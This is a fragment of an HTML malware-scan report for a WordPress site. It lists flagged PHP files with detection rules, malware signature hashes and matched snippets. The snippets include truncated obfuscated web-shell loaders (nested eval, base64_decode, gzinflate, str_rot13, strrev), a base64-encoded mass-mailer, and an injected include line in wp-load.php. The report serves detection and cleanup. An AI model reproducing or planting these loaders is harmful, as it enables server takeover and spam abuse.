</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cExE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3BLb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"base64_decode"</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_89").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-load.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 3.98 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:05</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 14:16:41</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_90" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #DD0000">'; $path = wp_guess_url() . '</span><span style="color: #007700">/</span><span style="color: #0000BB">wp</span><span style="color: #007700">-</span><span style="color: #0000BB">admin</span><span style="color: #007700">/</span><span style="color: #0000BB">setup</span><span style="color: #007700">-</span><span style="color: #0000BB">config</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #DD0000">'; if ( ! str_contains( $_SERVER['</span><span style="color: #0000BB">REQUEST_URI</span><span style="color: #DD0000">'], '</span><span style="color: #0000BB">setup</span><span style="color: #007700">-</span><span style="color: #0000BB">config</span><span style="color: #DD0000">' ) ) { header( '</span><span style="color: #0000BB">Location</span><span style="color: #007700">: </span><span style="color: #DD0000">' . $path ); exit; } wp_load_translations_early(); $die = '</span><span style="color: #007700"><</span><span style="color: #0000BB">p</span><span style="color: #007700">></span><span style="color: #DD0000">' . sprintf( __( "There doesn'</span><span style="color: #0000BB">t seem to be a </span><span style="color: #007700">%</span><span style="color: #0000BB">s</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"L3Zhci93d3cvYmFydG9saW5pL2JhcnRvbGluaS5jb20udWEvd3AtaW5jbHVkZXMvYmxvY2tzL2NvdmVyL3N0eWxlLXJlbC5jc3M="</span><span style="color: #007700">);</span><span style="color: #0000BB">?><?php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">can be disabled in php</span><span style="color: #007700">.</span><span style="color: #0000BB">ini</span><span style="color: #007700">. </span><span style="color: #0000BB">On systems where that is the </span><span style="color: #007700">case,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to the wp</span><span style="color: #007700">-</span><span style="color: #0000BB">config</span><span style="color: #007700">.</span><span style="color: #0000BB">php file</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">as </span><span style="color: #0000BB">this call to the </span><span style="color: #007700">function</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">() </span><span style="color: #0000BB">check</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'error_reporting' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 73</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_90").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ovauuevob.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 19.06 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 20:12:32</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 20:12:32</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_91" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSvuX0l+i/6Jm9xfGkJT3L4yTp5urFQ/jX0Q...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $LNuWx = '</span><span style="color: #0000BB">gzinflate</span><span style="color: #DD0000">'; $sJhXG = '</span><span style="color: #0000BB">str_rot13</span><span style="color: #DD0000">'; $Shgrt = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; echo '</span><span style="color: #007700"><</span><span style="color: #0000BB">br</span><span style="color: #007700">> </span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); eval($Shgrt($sJhXG($LNuWx($DesQW('</span><span style="color: #0000BB">rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf</span><span style="color: #007700">/</span><span style="color: #0000BB">h7yy8iIOHH</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$Shgrt</span><span style="color: #007700">(</span><span style="color: #0000BB">$sJhXG</span><span style="color: #007700">(</span><span style="color: #0000BB">$LNuWx</span><span style="color: #007700">(</span><span style="color: #0000BB">$DesQW</span><span style="color: #007700">(</span><span style="color: #DD0000">'rXtTmCfxkmXZZpdt27btf9m2bavLruqybdtVXTa6bJvbc2fu3Z2987Tf/h7yy8iIOHHiPGRGPgQP1b8dXU7Gv8eaUUd3SkdcS15BWEuVlNKSg8nLi9XJiFna0ktC1YZTS02OlVGf0tPO0un/98WX5z9YiLNYeBjrk1IqOavJ6FN6iSka2nNy/LWdzO08nQ3dbF0oLZ1MTc3NCA1NLcydTHn+FeFpZ2/k6cLDxGlvpPVPy/tfcP9zH4SGRm7mDoYWzjy6HP/WO9+/oHl02f/N+V91fHk4OIXkvGT1Sf9J6D+UZPu/ZTR0s2e2dnKlpDI3dKOk/RvByvg/iP3fo/4JTPm3W3sLM75/2v+owPL/nO5N9S/PPzT+lwa+vjx/Ecz+2YgvD/M/SvDRuP3t0oGUj/4fXm8nM0+nf9j/aVIx8vG5kVI6u/FQ2ZHS6jL/Oy0PBztjPoe/tP/TR+tGSv...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 eval_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RinY</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_91").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ouvma.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:16:37</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:16:37</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_92" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_92").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/faeol.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 18:58:22</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 18:58:22</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_93" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
